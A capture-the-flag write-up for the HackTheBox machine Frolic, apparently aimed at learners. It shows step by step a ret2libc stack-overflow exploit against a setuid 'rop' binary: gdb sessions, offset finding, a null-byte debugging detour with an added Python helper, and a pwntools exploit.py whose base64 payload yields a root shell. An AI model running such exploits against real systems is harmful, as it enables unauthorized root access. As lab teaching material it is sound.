www-data@frolic:/home/ayush/.binary$ ./rop Hello
[+] Message sent: Hello
www-data@frolic:/home/ayush/.binary$ ./rop
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
Segmentation fault (core dumped)
The program simply echoes its argument, but with a long enough input it crashes with a segmentation fault.
We transfer the binary to our machine to analyze it.
www-data@frolic:/home/ayush/.binary$ scp rop u505@10.10.14.26:/home/u505/HTB/Machines/Frolic/
Could not create directory '/var/www/.ssh'.
The authenticity of host '10.10.14.26 (10.10.14.26)' can't be established.
ECDSA key fingerprint is SHA256:ul2yK4MycGHJVeGXwtf6Uts1TELbRlDwqXUxP/9K9m4.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
u505@10.10.14.26's password:
rop                                           100% 7480     7.3KB/s   00:00
Binary analysis
u505@kali:~/HTB/Machines/Frolic$ checksec rop
[*] '/opt/HTB/Machines/Frolic/rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
www-data@frolic:/home/ayush/.binary$ cat /proc/sys/kernel/randomize_va_space
0
NX prevents executing code placed on the stack, but ASLR (address space layout randomization) is disabled (randomize_va_space is 0), so the glibc addresses are the same on every run.
The binary is very simple: it first calls setuid to become root, then passes its argument to the vuln function.
In the vuln function the argument is copied into a local buffer with strcpy, without any length check.
Buffer overflow offset
u505@kali:~/HTB/Machines/Frolic$ gdb rop
GNU gdb (Debian 8.3.1-1) 8.3.1
Copyright (C) 2019 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from rop...
(No debugging symbols found in rop)
(gdb) init-peda
gdb-peda$ pattern create 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
Starting program: /opt/HTB/Machines/Frolic/rop 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x79 ('y')
EBX: 0xffffd550 --> 0x2
ECX: 0x7fffffe5
EDX: 0xf7fad010 --> 0x0
ESI: 0xf7fab000 --> 0x1d6d6c
EDI: 0xf7fab000 --> 0x1d6d6c
EBP: 0x31414162 ('bAA1')
ESP: 0xffffd520 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
EIP: 0x41474141 ('AAGA')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41474141
[------------------------------------stack-------------------------------------]
0000| 0xffffd520 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0004| 0xffffd524 ("2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0xffffd528 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0012| 0xffffd52c ("A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0xffffd530 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0020| 0xffffd534 ("AA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0xffffd538 ("AJAAfAA5AAKAAgAA6AAL")
0028| 0xffffd53c ("fAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41474141 in ?? ()
gdb-peda$ pattern offset 0x41474141
1095188801 found at offset: 52
The saved return address sits 52 bytes into the buffer: bytes 52 to 55 of the input ("AAGA", read little-endian as 0x41474141) are popped into EIP when vuln returns.
EIP control
Our first script will put the value we want in the EIP register.
u505@kali:~/HTB/Machines/Frolic$ cat exploit.py #!/usr/bin/python from pwn import * junk = 'D'*52 eip=0xdeadc0de after = 'U'*8 payload = junk + p32(eip) + after
file = open("test","w") file.write (payload) file.close()
This first script writes 52 D bytes, the value 0xdeadc0de packed little-endian (de c0 ad de) and 8 U bytes into the file test. If we pass the content of that file as the argument, vuln should return to 0xdeadc0de and crash there, with ESP pointing at the U bytes.
u505@kali:~/HTB/Machines/Frolic$ python exploit.py
u505@kali:~/HTB/Machines/Frolic$ xxd test
00000000: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000010: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000020: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000030: 4444 4444 dec0 adde 5555 5555 5555 5555 DDDD....UUUUUUUU
Execution
gdb-peda$ r `cat test`
Starting program: /opt/HTB/Machines/Frolic/rop `cat test`

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x40 ('@')
EBX: 0xffffd560 --> 0x2
ECX: 0x0
EDX: 0xf7fad010 --> 0x0
ESI: 0xf7fab000 --> 0x1d6d6c
EDI: 0xf7fab000 --> 0x1d6d6c
EBP: 0x44444444 ('DDDD')
ESP: 0xffffd530 ("UUUUUUUU")
EIP: 0xdeadc0de
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0xdeadc0de
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 ("UUUUUUUU")
0004| 0xffffd534 ("UUUU")
0008| 0xffffd538 --> 0xffffd600 --> 0xffffd79c ("SHELL=/bin/bash")
0012| 0xffffd53c --> 0x8048561 (<__libc_csu_init+33>: lea eax,[ebx-0xf8])
0016| 0xffffd540 --> 0xffffd560 --> 0x2
0020| 0xffffd544 --> 0x0
0024| 0xffffd548 --> 0x0
0028| 0xffffd54c --> 0xf7df2811 (<__libc_start_main+241>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xdeadc0de in ?? ()
Strategy
The stack is not executable, so we cannot run shellcode placed in our argument, but we can return into functions that are already mapped from glibc (a ret2libc attack). ASLR is not enabled on the victim machine, so the glibc addresses are the same on every run.
Our goal is to call system("/bin/sh") and then return into exit, so the program ends cleanly instead of crashing.
The payload should be:
junk (52 bytes) + address of system + address of exit + address of the string "/bin/sh" inside glibc
When vuln returns into system, the stack looks like a normal call: the next dword (exit) is where system returns and the dword after it is system's first argument, the pointer to "/bin/sh". The string itself is not in the payload; we reuse the copy that glibc already contains.
First we try on our own machine, so we turn off ASLR.
u505@kali:~/HTB/Machines/Frolic$ sudo sysctl kernel.randomize_va_space=0
[sudo] password for u505:
kernel.randomize_va_space = 0
u505@kali:~/HTB/Machines/Frolic$ ldd rop
linux-gate.so.1 (0xf7fd3000)
libc.so.6 => /lib32/libc.so.6 (0xf7dd4000)
/lib/ld-linux.so.2 (0xf7fd4000)
We have the glibc base address: 0xf7dd4000.
u505@kali:~/HTB/Machines/Frolic$ readelf -s /lib32/libc.so.6 | grep system
   257: 0012b320   102 FUNC    GLOBAL DEFAULT   14 svcerr_systemerr@@GLIBC_2.0
   658: 00042700    55 FUNC    GLOBAL DEFAULT   14 __libc_system@@GLIBC_PRIVATE
  1528: 00042700    55 FUNC    WEAK   DEFAULT   14 system@@GLIBC_2.0
We have the offset of the function system inside glibc: 0x42700. Next, the offset of exit:
u505@kali:~/HTB/Machines/Frolic$ readelf -s /lib32/libc.so.6 | grep " exit@@"
   150: 00035790    33 FUNC    GLOBAL DEFAULT   14 exit@@GLIBC_2.0
And finally the offset of the string /bin/sh inside glibc (strings -t x prints the offset in hex):
u505@kali:~/HTB/Machines/Frolic$ strings -atx /lib32/libc.so.6 | grep "/bin/sh"
17ff68 /bin/sh
Test
u505@kali:~/HTB/Machines/Frolic$ python exploit.py
[*] systemaddr 0xf7e16700
[*] exitaddr 0xf7e09790
[*] binshaddr 0xf7f53f68
u505@kali:~/HTB/Machines/Frolic$ xxd test
00000000: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
00000010: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
00000020: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
00000030: 4444 4444 0067 e1f7 9097 e0f7 683f f5f7  DDDD.g......h?..
u505@kali:~/HTB/Machines/Frolic$ sudo chown root:root rop
u505@kali:~/HTB/Machines/Frolic$ sudo chmod 4755 rop
u505@kali:~/HTB/Machines/Frolic$ ls -l rop
-rwsr-xr-x 1 root root 7480 Feb 13 15:28 rop
u505@kali:~/HTB/Machines/Frolic$ ./rop `cat test`
-bash: warning: command substitution: ignored null byte in input
Segmentation fault
It didn't work :( so I set a breakpoint on the leave instruction at the end of vuln to find the issue.
gdb-peda$ pdisass vuln
Dump of assembler code for function vuln:
   0x080484f8 <+0>:	push   ebp
   0x080484f9 <+1>:	mov    ebp,esp
   0x080484fb <+3>:	sub    esp,0x38
   0x080484fe <+6>:	sub    esp,0x8
   0x08048501 <+9>:	push   DWORD PTR [ebp+0x8]
   0x08048504 <+12>:	lea    eax,[ebp-0x30]
   0x08048507 <+15>:	push   eax
   0x08048508 <+16>:	call   0x8048350 <strcpy@plt>
   0x0804850d <+21>:	add    esp,0x10
   0x08048510 <+24>:	sub    esp,0xc
   0x08048513 <+27>:	push   0x80485dd
   0x08048518 <+32>:	call   0x8048340 <printf@plt>
   0x0804851d <+37>:	add    esp,0x10
   0x08048520 <+40>:	sub    esp,0xc
   0x08048523 <+43>:	lea    eax,[ebp-0x30]
   0x08048526 <+46>:	push   eax
   0x08048527 <+47>:	call   0x8048340 <printf@plt>
   0x0804852c <+52>:	add    esp,0x10
   0x0804852f <+55>:	nop
   0x08048530 <+56>:	leave
   0x08048531 <+57>:	ret
End of assembler dump.
gdb-peda$ br *0x08048530
Breakpoint 1 at 0x8048530
gdb-peda$ r `cat test`
Starting program: /opt/HTB/Machines/Frolic/rop `cat test`
/bin/bash: warning: command substitution: ignored null byte in input
[----------------------------------registers-----------------------------------]
EAX: 0x3f ('?')
EBX: 0xffffd560 --> 0x2
ECX: 0x0
EDX: 0xf7fad010 --> 0x0
ESI: 0xf7fab000 --> 0x1d6d6c
EDI: 0xf7fab000 --> 0x1d6d6c
EBP: 0xffffd528 ("DDDDg\341\367\220\227\340\367h?\365", <incomplete sequence \367>)
ESP: 0xffffd4f0 --> 0xffffd548 --> 0x0
EIP: 0x8048530 (<vuln+56>: leave)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048527 <vuln+47>:	call   0x8048340 <printf@plt>
   0x804852c <vuln+52>:	add    esp,0x10
   0x804852f <vuln+55>:	nop
=> 0x8048530 <vuln+56>:	leave
   0x8048531 <vuln+57>:	ret
   0x8048532:	xchg   ax,ax
   0x8048534:	xchg   ax,ax
   0x8048536:	xchg   ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xffffd4f0 --> 0xffffd548 --> 0x0
0004| 0xffffd4f4 --> 0x0
0008| 0xffffd4f8 ('D' <repeats 52 times>, "g\341\367\220\227\340\367h?\365", <incomplete sequence \367>)
0012| 0xffffd4fc ('D' <repeats 48 times>, "g\341\367\220\227\340\367h?\365", <incomplete sequence \367>)
0016| 0xffffd500 ('D' <repeats 44 times>, "g\341\367\220\227\340\367h?\365", <incomplete sequence \367>)
0020| 0xffffd504 ('D' <repeats 40 times>, "g\341\367\220\227\340\367h?\365", <incomplete sequence \367>)
0024| 0xffffd508 ('D' <repeats 36 times>, "g\341\367\220\227\340\367h?\365", <incomplete sequence \367>)
0028| 0xffffd50c ('D' <repeats 32 times>, "g\341\367\220\227\340\367h?\365", <incomplete sequence \367>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x08048530 in vuln ()
We see that right after the 52 Ds the next byte is g (0x67). The null byte that should come first (system is at 0xf7e16700, stored as 00 67 e1 f7) is missing, so the rest of the payload is shifted one byte to the left. Stepping over leave and ret confirms it:
gdb-peda$ next
...
gdb-peda$
[----------------------------------registers-----------------------------------]
EAX: 0x3f ('?')
EBX: 0xffffd560 --> 0x2
ECX: 0x0
EDX: 0xf7fad010 --> 0x0
ESI: 0xf7fab000 --> 0x1d6d6c
EDI: 0xf7fab000 --> 0x1d6d6c
EBP: 0x44444444 ('DDDD')
ESP: 0xffffd530 --> 0x68f7e097
EIP: 0x90f7e167
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x90f7e167
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0x68f7e097
0004| 0xffffd534 --> 0xf7f53f
0008| 0xffffd538 --> 0xffffd600 --> 0xffffd79c ("SHELL=/bin/bash")
0012| 0xffffd53c --> 0x8048561 (<__libc_csu_init+33>: lea eax,[ebx-0xf8])
0016| 0xffffd540 --> 0xffffd560 --> 0x2
0020| 0xffffd544 --> 0x0
0024| 0xffffd548 --> 0x0
0028| 0xffffd54c --> 0xf7df2811 (<__libc_start_main+241>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x90f7e167 in ?? ()
The address does not correspond to the system address. My system address, 0xf7e16700, contains a null byte, and bash command substitution drops null bytes (that is what the "ignored null byte in input" warning means), so every byte after it moves one position to the left and EIP receives 0x90f7e167 instead. The file on disk is correct:
00000030: 4444 4444 0067 e1f7 9097 e0f7 683f f5f7 DDDD.g......h?..
So the payload delivered is
00000030: 4444 4444 67e1 f790 97e0 f768 3ff5 f7 DDDDg......h?..
So my machine is not suitable for this test: with the 32-bit libc mapped at 0xf7dd4000, system sits at an address that cannot be passed through argv at all, since a null byte also terminates the C string that strcpy copies. Afterward it seems easy, but it took me a long time to realize this issue... The libc of the target (base 0xb7e19000) gives addresses with no null byte, so a 32-bit Ubuntu 16.04 VM with the same libc build is a better test bed.
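To make the null-byte problem concrete, here is an added Python example (mine, not the writeup's exploit.py, and written without pwntools). It builds the ret2libc payload from the Strategy section for the Kali libc and for the target libc, lists the offsets of any 0x00 bytes, models what bash command substitution hands to argv[1] by dropping those bytes, and reports which address vuln's ret actually pops. The base addresses and offsets are the ones ldd, readelf and strings printed above and below; the function names and the analyse helper are mine.

```python
import base64
import struct

JUNK_LEN = 52  # offset of the saved return address, found with pattern offset


def ret2libc_payload(libc_base, system_off, exit_off, binsh_off, junk_len=JUNK_LEN):
    """junk + &system + &exit + &"/bin/sh", each address 32-bit little-endian.

    When vuln's ret pops &system the stack looks like a normal call to
    system: the next dword (&exit) is where system returns and the one after
    it is system's first argument, the pointer to "/bin/sh" inside libc.
    """
    addrs = (libc_base + system_off, libc_base + exit_off, libc_base + binsh_off)
    return b"D" * junk_len + struct.pack("<III", *addrs)


def null_byte_positions(payload):
    """Offsets of every 0x00 in the payload.

    Any NUL is fatal for argv delivery: bash command substitution drops it,
    and even a shell that kept it would hand execve a C string that strcpy
    stops copying at.
    """
    return [i for i, b in enumerate(payload) if b == 0]


def bash_command_substitution(payload):
    """Model of `./rop \`cat test\``: bash strips NUL bytes (with a warning)."""
    return payload.replace(b"\x00", b"")


def landing_eip(argv1, junk_len=JUNK_LEN):
    """The dword vuln's ret pops, given the bytes that actually reached argv[1].

    argv strings are NUL-terminated, so a short tail reads as zero bytes.
    """
    chunk = argv1[junk_len:junk_len + 4].ljust(4, b"\x00")
    return struct.unpack("<I", chunk)[0]


# Kali: 64-bit host with /lib32/libc.so.6, values from ldd/readelf/strings above.
KALI = dict(libc_base=0xf7dd4000, system_off=0x42700, exit_off=0x35790, binsh_off=0x17ff68)
# Frolic target (the 32-bit Ubuntu 16.04 test VM has the same offsets, base 0xb7e1a000).
TARGET = dict(libc_base=0xb7e19000, system_off=0x3ada0, exit_off=0x2e9d0, binsh_off=0x15ba0b)


def analyse(cfg):
    """Build the payload for one libc and report what survives shell delivery."""
    payload = ret2libc_payload(**cfg)
    delivered = bash_command_substitution(payload)
    return {
        "system": cfg["libc_base"] + cfg["system_off"],
        "nulls": null_byte_positions(payload),
        "eip": landing_eip(delivered),
        "b64": base64.b64encode(payload).decode(),
    }


if __name__ == "__main__":
    for name, cfg in (("kali", KALI), ("target", TARGET)):
        r = analyse(cfg)
        verdict = "OK" if r["eip"] == r["system"] else "BROKEN"
        print(f"{name}: system=0x{r['system']:08x} nulls={r['nulls']} "
              f"ret->0x{r['eip']:08x} {verdict}")
        print(f"  base64: {r['b64']}")
```

On the Kali values it reports a null at offset 52 and a return into 0x90f7e167, which is exactly the EIP the gdb session showed; on the target values there are no nulls, the return lands on system and the base64 line is the one pasted into the final step. The check is worth running before every attempt: if null_byte_positions is not empty, no amount of shell quoting will help, and the fix is a libc mapping (or a different gadget) whose addresses contain no 0x00.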
Test in 32 bits machine
Disable ASLR
u505@ubuntu1604432bits:~$ sudo sysctl kernel.randomize_va_space=0
kernel.randomize_va_space = 0
Change perms of rop file
u505@ubuntu1604432bits:~$ sudo chown root:root rop
u505@ubuntu1604432bits:~$ sudo chmod 4755 rop
u505@ubuntu1604432bits:~$ ls -l rop
-rwsr-xr-x 1 root root 7480 Feb 13 18:04 rop
Look for the addresses
u505@ubuntu1604432bits:~$ ldd rop
	linux-gate.so.1 => (0xb7fda000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e1a000)
	/lib/ld-linux.so.2 (0xb7fdb000)
u505@ubuntu1604432bits:~$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
   245: 00112f20    68 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@@GLIBC_2.0
   627: 0003ada0    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
  1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
u505@ubuntu1604432bits:~$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " exit@@"
   141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
u505@ubuntu1604432bits:~$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "bin/sh"
 15ba0b /bin/sh
We update exploit.py with this base address and these offsets and generate the payload file. None of the three addresses contains a null byte. The file is base64-encoded so it can be pasted into a shell on the test machine.
u505@kali:~/HTB/Machines/Frolic$ python exploit.py
[*] systemaddr 0xb7e54da0
[*] exitaddr 0xb7e489d0
[*] binshaddr 0xb7f75a0b
u505@kali:~/HTB/Machines/Frolic$ cat test | base64
RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERKBN5bfQieS3C1r3tw==
And we test it on the test machine:
u505@ubuntu1604432bits:~$ ./rop `echo -n RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERKBN5bfQieS3C1r3tw== | base64 -d`
# whoami
root
Escalation on the target machine
www-data@frolic:/home/ayush/.binary$ ldd rop
	linux-gate.so.1 => (0xb7fda000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
	/lib/ld-linux.so.2 (0xb7fdb000)
www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
   245: 00112f20    68 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@@GLIBC_2.0
   627: 0003ada0    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
  1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " exit@@"
   141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
www-data@frolic:/home/ayush/.binary$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "bin/sh"
 15ba0b /bin/sh
We generate the payload file
u505@kali:~/HTB/Machines/Frolic$ cat exploit.py
#!/usr/bin/python
from pwn import *

junk = 'D'*52                 # 48-byte buffer at ebp-0x30 plus the 4 bytes of saved ebp

# values taken from ldd/readelf/strings on the target (ASLR is off there)
glibcbase=0xb7e19000
systemoffset=0x0003ada0
exitoffset=0x0002e9d0
binshoffset=0x15ba0b

systemaddr=glibcbase+systemoffset
exitaddr=glibcbase+exitoffset
binshaddr=glibcbase+binshoffset
log.info("systemaddr 0x%x" % systemaddr)
log.info("exitaddr 0x%x" % exitaddr)
log.info("binshaddr 0x%x" % binshaddr)

# return address -> system, system's return address -> exit, system's argument -> "/bin/sh"
payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)

file = open("test","w")
file.write (payload)
file.close()
u505@kali:~/HTB/Machines/Frolic$ python exploit.py
[*] systemaddr 0xb7e53da0
[*] exitaddr 0xb7e479d0
[*] binshaddr 0xb7f74a0b
u505@kali:~/HTB/Machines/Frolic$ cat test | base64
RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERKA95bfQeeS3C0r3tw==
And we execute the file with the payload
www-data@frolic:/home/ayush/.binary$ ./rop `echo -n "RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERKA95bfQeeS3C0r3tw==" | base64 -d`
# whoami
root
Root Flag
root@frolic:/tmp# cat /root/root.txt <ROOT_FLAG>
References
- Gaining RCE by abusing Node-RED
- noderedsh.py
- Linux Kernel - BPF Sign Extension Local Privilege Escalation
Daniel Simao 09:51, 12 February 2020 (EST)